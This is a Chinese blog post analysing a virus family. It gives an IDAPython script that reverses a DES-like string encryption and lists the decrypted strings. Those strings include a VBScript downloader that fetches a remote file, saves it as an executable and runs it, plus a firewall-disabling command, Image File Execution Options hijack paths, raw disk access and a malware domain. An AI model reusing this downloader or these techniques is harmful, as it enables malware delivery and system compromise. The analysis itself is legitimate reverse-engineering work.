病毒亲缘

   去年大概10月多的时候，有一个病毒非常流行，它会释放一个sys文件，名字是PCIbus.sys。这个驱动文件里面的重要信息都是加密的，由于各种原因没有调试，而且那时候颇有时间，就写了这个病毒的解密脚本，当时还是下了点功夫的。这几天分析一种流行病毒的时候，发现病毒体内又用了加密的方法，在跟踪其解密函数的时候隐隐感觉到似曾相识，就联想起了PCIbus.sys，翻出了当时的解密脚本，发现是相同的解密方法。
   这样有实力的团体，孜孜不倦地书写着病毒，不知道它们出了多少病毒，也无法预测它们还要放出多少害人的猛兽，而在现行的法律下面我们唯一能做的就是把它们的罪恶形迹暴露出来。该团体的病毒酷爱这种解密方法，那么就让这个算法在阳光下暴晒吧。记录下解密脚本，省得以后又找不到。
"""
PCIBUS.py
This script only decodes strings that were encrypted for use with a call of the form:
PCIBUS_Decode(pdecodebuff,pEnCryptCode,len(pEnCryptCode),pTable_copy,0xF,1)
"""
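def InitBuffer():
    """Zero-fill the module-level scratch buffers used by the decoder.

    Appends 0x50 zero entries to each bit-level work list and 0x1900
    (0x50 * 0x50) zero entries to ``pexecryCode``, the plaintext output
    buffer.  The lists are module globals whose definitions are not part
    of this listing; they must exist before this is called.  The function
    extends rather than resets them, so it is meant to run exactly once.
    """
    bit_buffers = (
        pikeFor40Table,
        ExchenageFor40Table,
        Trangle,
        Trangle2,
        pUnknown,
        loc_tempd,
        loc_tempc,
    )
    zeros = [0] * 0x50
    for buf in bit_buffers:
        buf.extend(zeros)
    # The original nested the output fill inside the 0x50 loop, which gives
    # 0x50 * 0x50 entries; the same total size is kept here.
    pexecryCode.extend([0] * (0x50 * 0x50))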
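def SpecialPrint(buffer, line):
    """Print *buffer* as consecutive slices of at most *line* elements each.

    Args:
        buffer: any sliceable sequence (the decoder passes lists of ints
            or of hex strings).
        line: number of elements per printed row; must be > 0.
    """
    # Step over the full length: the original iterated to len(buffer) - 1,
    # which dropped the final row whenever len(buffer) - 1 was a multiple
    # of ``line`` (e.g. 33 elements at 16 per row printed only two rows).
    for start in range(0, len(buffer), line):
        print(buffer[start:start + line])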
def PrintHex(buffer, line):
    """Dump the first 8 entries of *buffer* as hex strings, *line* per row.

    Only ``buffer[0:8]`` is shown, i.e. one 8-byte block; the hex copy of
    the whole buffer is built but not printed (kept as in the original).
    """
    as_hex = [hex(value) for value in buffer]
    SpecialPrint(as_hex[:8], line)
   
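def ReadData(Pos, lenth, buffer, filehandle, isprint):
    """Read *lenth* raw bytes at absolute offset *Pos* and append them to *buffer* as ints.

    Args:
        Pos: absolute file offset (seek from the start of the file).
        lenth: number of bytes to read; fewer are appended at end of file.
        buffer: list of ints that receives one entry (0..255) per byte.
        filehandle: file object opened in binary mode.
        isprint: when non-zero, dump the whole *buffer* 16 entries per row.
    """
    filehandle.seek(Pos, 0)
    raw = filehandle.read(lenth)
    # bytearray yields ints for both a Python 2 str and a Python 3 bytes
    # object, so the per-character ord() of the original is not needed.
    buffer.extend(bytearray(raw))
    if isprint != 0:
        SpecialPrint(buffer, 16)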
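def InitGlobleData():
    """Load the decoder's tables from the sample file and zero the work buffers.

    Every ``ReadData`` call below fills a module-level list (``pTable_copy``,
    ``Key4Table``, ``NumberTable2``, ``Key6Table``, ``Table``, ``Table2``,
    ``Goden``, ``inside_table``, ``pCryptCode``, ``GodenTable``) whose
    definition is not part of this listing; the lists must exist before
    this is called.  The offsets are file offsets inside one specific
    build of the driver, and ``virus_file`` is a placeholder that has to be
    edited to point at the sample being analysed.

    An earlier build used these offsets (kept for reference):
        pos_4Key = 0x5D48, pos_6Key = 0x5D80, pos_num2 = 0x5DB0,
        instans = 0x7008, pos_table = 0x5C78, pos_table2 = 0x5CB8,
        pos_goden = 0x5D28, pos_goden1 = 0x5CF8,
        pos_inside_table = 0x5DC0, pos_crypt = 0x5A78

    The table sizes (0x38, 0x30, 0x10 rotation counts, 0x40 permutations,
    a 0x210-byte lookup table) look like a DES-style key schedule and
    cipher; that is inferred from the sizes here, not verified against the
    driver.
    """
    pos_4Key = 0x7398
    pos_6Key = 0x73D0
    pos_num2 = 0x7400

    pos_table = 0x72C8
    pos_table2 = 0x7308
    pos_goden = 0x7378

    pos_goden1 = 0x7348
    pos_inside_table = 0x7410
    pos_crypt = 0x620C
    instans = 0xE508

    InitBuffer()
    virus_file = 'input file path'
    # (offset, length, destination list); the read order is unchanged.
    reads = (
        (instans, 0x10, pTable_copy),
        (pos_4Key, 0x38, Key4Table),
        (pos_num2, 0x10, NumberTable2),
        (pos_6Key, 0x30, Key6Table),
        (pos_table, 0x40, Table),
        (pos_table2, 0x40, Table2),
        (pos_goden, 0x40, Goden),
        (pos_inside_table, 0x210, inside_table),
        (pos_crypt, 0x1C, pCryptCode),
        (pos_goden1, 0x40, GodenTable),
    )
    # ``with`` closes the handle even if a read fails; the original only
    # closed it on the success path.
    with open(virus_file, 'rb') as hfile:
        for offset, length, dest in reads:
            ReadData(offset, length, dest, hfile, 0)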
 #,pikeFor40Table,Key4Table,Key6Table,ExchenageFor40Table,NumberTable2      
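def extendTable(Mem_ex, pTable_ex):
    """Expand an 8-byte key into 16 round keys of 0x30 bits, appended to *Mem_ex*.

    Args:
        Mem_ex: list that receives 16 * 0x30 bit values (0/1), one per bit.
        pTable_ex: at least 8 key bytes as ints; only the first 8 are used.

    Returns:
        *Mem_ex*, for convenience.

    The shape (64 key bits reduced to 56 through ``Key4Table``, per-round
    left rotation of two 28-bit halves by ``NumberTable2``, 48 bits picked
    through ``Key6Table``) matches a DES-style key schedule; this reading
    is inferred from the table sizes, not verified against the driver.
    All tables are 1-based.  Works in the module-level scratch lists
    ``pikeFor40Table`` and ``ExchenageFor40Table``.
    """
    # Unpack 64 key bits, LSB first within each byte.
    for index in range(0, 0x40):
        pikeFor40Table[index] = (pTable_ex[index // 8] >> (index & 7)) & 1
    # Select 56 of them.
    for index in range(0, 0x38):
        ExchenageFor40Table[index] = pikeFor40Table[Key4Table[index] - 1]
    for index in range(0, 0x38):
        pikeFor40Table[index] = ExchenageFor40Table[index]
    for index in range(0, 0x10):
        dwseed = NumberTable2[index]
        dwspan = 0x1c - dwseed
        # Rotate the first 28-bit half left by dwseed positions.
        for i_copy in range(0, dwseed):
            ExchenageFor40Table[i_copy] = pikeFor40Table[i_copy]
        for i_copy in range(0, dwspan):
            pikeFor40Table[i_copy] = pikeFor40Table[i_copy + dwseed]
        for i_copy in range(0, dwseed):
            pikeFor40Table[dwspan + i_copy] = ExchenageFor40Table[i_copy]
        # Same rotation for the second half, which starts at bit 0x1c.
        for i_copy in range(0, dwseed):
            ExchenageFor40Table[i_copy] = pikeFor40Table[0x1c + i_copy]
        for i_copy in range(0, dwspan):
            pikeFor40Table[0x1c + i_copy] = pikeFor40Table[0x1c + i_copy + dwseed]
        for i_copy in range(0, dwseed):
            pikeFor40Table[0x1C + dwspan + i_copy] = ExchenageFor40Table[i_copy]
        # Pick this round's 48 key bits and append them.
        for inside_index in range(0, 0x30):
            ExchenageFor40Table[inside_index] = pikeFor40Table[Key6Table[inside_index] - 1]
        Mem_ex.extend(ExchenageFor40Table[:0x30])
    return Mem_ex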
               
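def Tableoption(pTable, key):
    """Build the round-key schedules for a *key*-byte key taken from *pTable*.

    The first 8 bytes always populate the module-level schedule ``oriMem``.
    When the effective key length exceeds 8, bytes 8..15 are copied to
    ``TableCopy8`` and populate ``oriMem2`` as a second schedule.

    ``key`` is clamped to 0x10: the original assigned ``bkey = key`` after
    the clamp, which made the clamp dead code; because only ``bkey > 8`` is
    tested, the observable result is unchanged.
    """
    bkey = min(key, 0x10)
    extendTable(oriMem, pTable)
    for index in range(0, 8):
        TableCopy8.append(pTable[index + 8])
    if bkey > 8:
        extendTable(oriMem2, TableCopy8)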
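def _finish_block(pBuffer):
    """Apply the ``Table2`` permutation to ``Trangle`` and pack its 64 bits into pBuffer[0:8].

    Shared tail of both ``Base_Decode`` branches.  Bits are packed LSB
    first within each byte, mirroring the unpack at the start of
    ``Base_Decode``.
    """
    for index in range(0, 0x40):
        ExchenageFor40Table[index] = Trangle[Table2[index] - 1]
    for index in range(0, 0x40):
        Trangle[index] = ExchenageFor40Table[index]
    for index in range(0, 8):
        pBuffer[index] = 0
    for index in range(0, 0x40):
        pBuffer[index // 8] |= Trangle[index] << (index & 7)


def Base_Decode(pBuffer, decode, Mem_ex, loc_Number):
    """Transform one 8-byte block *decode* with the round keys in *Mem_ex* into pBuffer[0:8].

    Args:
        pBuffer: list with at least 8 int slots that receives the result.
            It may alias *decode*: the input is fully unpacked into the
            scratch list before the output slots are zeroed.
        decode: 8 input bytes as ints.
        Mem_ex: 16 * 0x30 round-key bits produced by ``extendTable``.
        loc_Number: non-zero walks the round keys last-to-first; zero walks
            them first-to-last with the two halves swapped.

    The structure (64-bit block, ``Table`` in, 16 Feistel rounds through
    ``Goden_decode``, ``Table2`` out, key order selecting direction) reads
    like DES; that is inferred from the code shape, not confirmed against
    the driver.  Uses the module-level scratch lists ``Trangle``,
    ``Trangle2``, ``pUnknown`` and ``ExchenageFor40Table``.
    """
    tail = [Mem_ex[0x2D0 + index] for index in range(0, 0x30)]
    # Unpack the block LSB-first into 64 bit values, then apply Table
    # (1-based, like every table read from the sample).
    for index in range(0, 0x40):
        Trangle[index] = (decode[index // 8] >> (index & 7)) & 1
    for index in range(0, 0x40):
        ExchenageFor40Table[index] = Trangle[Table[index] - 1]
    for index in range(0, 0x40):
        Trangle[index] = ExchenageFor40Table[index]

    if loc_Number != 0:
        for Glob_index in range(0, 0x10):
            dist = 0x2D0 - Glob_index * 0x30
            for index in range(0, 0x30):
                tail[index] = Mem_ex[dist + index]
            # Save the left half, run the round function in place, XOR the
            # result with the right half and move the saved half across.
            for index in range(0, 0x20):
                pUnknown[index] = Trangle[index]
            Goden_decode(Trangle, tail)
            for index_in in range(0, 0x20):
                Trangle[index_in] = Trangle[index_in] ^ Trangle[0x20 + index_in]
            for index_in in range(0, 0x20):
                Trangle[0x20 + index_in] = pUnknown[index_in]
        _finish_block(pBuffer)
    else:
        # Same round structure, keys first-to-last, halves swapped through
        # Trangle2.
        for index in range(0, 0x20):
            Trangle2[index] = Trangle[index + 0x20]
        for Glob_index in range(0, 0x10):
            dist = Glob_index * 0x30
            for index in range(0, 0x30):
                tail[index] = Mem_ex[dist + index]
            for index in range(0, 0x20):
                pUnknown[index] = Trangle2[index]
            Goden_decode(Trangle2, tail)
            for index_in in range(0, 0x20):
                Trangle2[index_in] = Trangle2[index_in] ^ Trangle[index_in]
            for index_in in range(0, 0x20):
                Trangle[index_in] = pUnknown[index_in]
        for index in range(0, 0x20):
            Trangle[index + 0x20] = Trangle2[index]
        _finish_block(pBuffer)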
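def Goden_decode(pTragal, orimems):
    """Round function: expand, XOR with the round key, table lookup, permute.

    Args:
        pTragal: 64-bit work list.  The bits selected by ``GodenTable``
            (1-based) are the input; pTragal[0:0x20] receives the output.
        orimems: 0x30 round-key bits (0/1).

    Uses the module-level ``GodenTable`` (0x30 entries), ``Goden`` (0x20
    entries) and the scratch list ``ExchenageFor40Table``, and calls
    ``crypts`` for the lookup stage.  The expand / XOR key / lookup /
    permute shape is DES-like; the tables themselves come from the sample.
    """
    mem = [0] * 0x50
    for index in range(0, 0x30):
        ExchenageFor40Table[index] = pTragal[GodenTable[index] - 1]
    for index in range(0, 0x30):
        mem[index] = ExchenageFor40Table[index]
    # XOR in the round key.  The original did this two bits per iteration;
    # the bitwise result is identical.
    for index in range(0, 0x30):
        mem[index] = mem[index] ^ orimems[index]
    crypts(pTragal, mem)
    for index in range(0, 0x20):
        ExchenageFor40Table[index] = pTragal[Goden[index] - 1]
    for index in range(0, 0x20):
        pTragal[index] = ExchenageFor40Table[index]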
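def crypts(pTragals, mems):
    """Lookup stage: 8 groups of 6 bits from *mems* become 8 groups of 4 bits in pTragals[0:0x20].

    For group ``g`` with bits ``b0..b5`` at ``mems[6g:6g+6]`` the index into
    the module-level ``inside_table`` is
    ``(2*b0 + b5 + 4*g) * 16 + (8*b1 + 4*b2 + 2*b3 + b4)``, i.e. a row from
    the outer two bits, a column from the inner four, and a 64-entry
    region per group — the same addressing scheme as the DES S-boxes.
    The four low bits of the looked-up value are written LSB first to
    ``pTragals[4g:4g+4]``.
    """
    for group in range(0, 8):
        i_mems = group * 6
        i_tra = group * 4
        row = (mems[i_mems] * 2 + mems[i_mems + 5] + i_tra) * 0x10
        column = (mems[i_mems + 3] + (mems[i_mems + 1] * 2 + mems[i_mems + 2]) * 2) * 2 + mems[i_mems + 4]
        value = inside_table[row + column]
        # Non-negative values, so shifting equals the original's
        # integer division by 2, 4 and 8.
        for bit in range(0, 4):
            pTragals[i_tra + bit] = (value >> bit) & 1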
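def PCIBUS_Decode(pexecryCode, pCryptCode, dwLenthOfCrypte, pTable, key, Number):
    """Decrypt *pCryptCode* block by block into *pexecryCode*.

    Args:
        pexecryCode: output list, at least ``(dwLenthOfCrypte // 8) * 8``
            entries long.
        pCryptCode: ciphertext bytes as ints.
        dwLenthOfCrypte: ciphertext length; a trailing partial block is
            silently ignored.
        pTable: 16 key bytes handed to ``Tableoption``.
        key: key length handed to ``Tableoption`` (0xF in the caller).
        Number: direction flag for the first and third ``Base_Decode`` pass.

    Returns:
        0 when there is no whole block to process, otherwise ``None``.

    Each block goes through three ``Base_Decode`` passes (schedule 1,
    schedule 2, schedule 1), the shape of two-key triple-DES.  The middle
    pass takes its direction flag from ``oriMem2[0]`` — a key-schedule
    bit — exactly as the original did; whether that is intended is not
    established here.  Uses the module-level scratch lists ``loc_tempd``
    and ``loc_tempc`` and the schedules ``oriMem`` / ``oriMem2``.
    """
    Tableoption(pTable, key)
    size = dwLenthOfCrypte // 8
    if size == 0:
        return 0
    for index in range(0, size):
        base = index * 8
        for index_de in range(0, 8):
            loc_tempd[index_de] = pCryptCode[base + index_de]
        Base_Decode(loc_tempc, loc_tempd, oriMem, Number)
        Base_Decode(loc_tempc, loc_tempc, oriMem2, oriMem2[0])
        Base_Decode(loc_tempc, loc_tempc, oriMem, Number)
        for index_de in range(0, 8):
            pexecryCode[base + index_de] = loc_tempc[index_de]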
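def FindPrePush(ea, num):
    """Return the address of the *num*-th ``push`` instruction before *ea* (IDAPython).

    Walks backwards with ``PrevHead``.  Returns ``BADADDR`` if no previous
    instruction exists before enough pushes were seen; the original kept
    looping in that case, because ``GetMnem(BADADDR)`` never contains
    ``push``.
    """
    cou_ea = ea
    found = 0
    while found < num:
        cou_ea = PrevHead(cou_ea, 0)
        if cou_ea == BADADDR:
            return BADADDR
        if 'push' in GetMnem(cou_ea):
            found += 1
    return cou_ea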
def LoadDataA(byte_ea):
    """Read a NUL-terminated byte string at *byte_ea* (IDAPython ``Byte``) into a list of ints.

    The terminator is not included; reading continues until a zero byte
    is found.
    """
    name = []
    cursor = byte_ea
    value = Byte(cursor)
    while value != 0:
        name.append(value)
        cursor += 1
        value = Byte(cursor)
    return name
 
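def FindAllDeCodeArg():
    """Collect the string-argument address of every call to ``Decode`` (IDAPython).

    ``RfirstB0`` / ``RnextB0`` enumerate the instructions referencing the
    symbol ``Decode``; for each one, the second ``push`` before it is
    located and its first operand taken as the ciphertext address.

    Returns:
        list of operand values, one per reference; unresolved operands are
        passed through unchanged (the caller skips the value 0).
    """
    # The original also stored Segments()[0] / SegEnd() into an unused
    # local; dropped, since Segments() is a generator in newer IDAPython
    # and the value was never read.
    address = []
    decode_rv = LocByName("Decode")
    xref = RfirstB0(decode_rv)
    while xref != BADADDR:
        sec_ea = FindPrePush(xref, 2)
        address.append(GetOperandValue(sec_ea, 0))
        xref = RnextB0(decode_rv, xref)
    return address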
   
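if __name__ == "__main__":
    # Script entry point: load the tables from the sample, find every
    # ciphertext passed to ``Decode`` in the IDA database, decrypt each one
    # and write the results to the log file.
    file_out = r"e:\unpack\log.txt"

    InitGlobleData()

    codes = FindAllDeCodeArg()
    # Text mode as in the original: every decoded string is written with
    # its terminating NUL and no other separator, so the log format is
    # unchanged.
    with open(file_out, 'w') as ho:
        for ea_add in codes:
            if ea_add == 0:
                # The original fell through here and re-emitted the previous
                # buffer contents for an unresolved address.
                continue
            pCryptCode = LoadDataA(ea_add)
            PCIBUS_Decode(pexecryCode, pCryptCode, len(pCryptCode), pTable_copy, 0xF, 1)
            # Copy up to and including the first NUL that is followed by
            # another NUL (or is the last entry).  The output buffer is never
            # cleared, so bytes of earlier, longer strings remain after it.
            str_my = []
            last = len(pexecryCode) - 1
            for index in range(0, len(pexecryCode)):
                value = pexecryCode[index]
                str_my.append(value)
                if value == 0 and (index == last or pexecryCode[index + 1] == 0):
                    break
            final = "".join(chr(value) for value in str_my)
            print(final)
            ho.write(final)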
 
运行结果:
 
update.
explorer.exe
\\.\obj
~wxp2ins.
Atixeve2.
kernel32.
CreateProcessA
urlmon.dll
URLDownloadToFileA
URLDownloadToFileA
wsnotifyo.cfg
wsnotifyw.cfg
\nctfub1.tmp
<script language=javascript src=
></script>
On Error Resume Next
Dim t, r, l, ads
t = "Microsoft.XML" + tian6 + "HTTP"
l = LCase("conlme.exe")
r = LCase(WScript.Arguments(0))
Set x = CreateObject(t)
x.Open "GET", r, 0
x.Send()
adults.vbs
wscript.exe
ads = "ADO"+"DB.Stream"
Set g = CreateObject(ads)
g.Mode = 3
g.Type = 1
g.Open()
g.Write(x.responseBody)
g.SaveToFile l, 2
Set ob = CreateObject("Shell.Application")
ob.ShellExecute l
ads = "ADO"+"DB.Stream"
Set g = CreateObject(ads)
g.Mode = 3
g.Type = 1
g.Open()
g.Write(x.responseBody)
g.SaveToFile l, 2
Set ob = CreateObject("Shell.Application")
ob.ShellExecute l
ads = "ADO"+"DB.Stream"
Set g = CreateObject(ads)
g.Mode = 3
g.Type = 1
g.Open()
g.Write(x.responseBody)
g.SaveToFile l, 2
Set ob = CreateObject("Shell.Application")
ob.ShellExecute l
ads = "ADO"+"DB.Stream"
Set g = CreateObject(ads)
g.Mode = 3
g.Type = 1
g.Open()
g.Write(x.responseBody)
g.SaveToFile l, 2
Set ob = CreateObject("Shell.Application")
ob.ShellExecute l
ads = "ADO"+"DB.Stream"
Set g = CreateObject(ads)
g.Mode = 3
g.Type = 1
g.Open()
g.Write(x.responseBody)
g.SaveToFile l, 2
Set ob = CreateObject("Shell.Application")
ob.ShellExecute l
ÈðÐÇÌáʾDO"+"DB.Stream"
Set g = CreateObject(ads)
g.Mode = 3
g.Type = 1
g.Open()
g.Write(x.responseBody)
g.SaveToFile l, 2
Set ob = CreateObject("Shell.Application")
ob.ShellExecute l
ÈðÐÇÌáʾDO"+"DB.Stream"
Set g = CreateObject(ads)
g.Mode = 3
g.Type = 1
g.Open()
g.Write(x.responseBody)
g.SaveToFile l, 2
Set ob = CreateObject("Shell.Application")
ob.ShellExecute l
wpcap.dll
tpnc.batl
net stop sharedaccess
svchost.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Notifyw
update.
avp.exe
www.3271.cc
explorer.exe
\\.\PhysicalDrive0
\\.\PhysicalHarDisk0
~wxp2ins.
Atixeve2.
\\.\AtiObject1
 


  1. Unknown说道:

    估计这类病毒的算法马上就会被修改了。
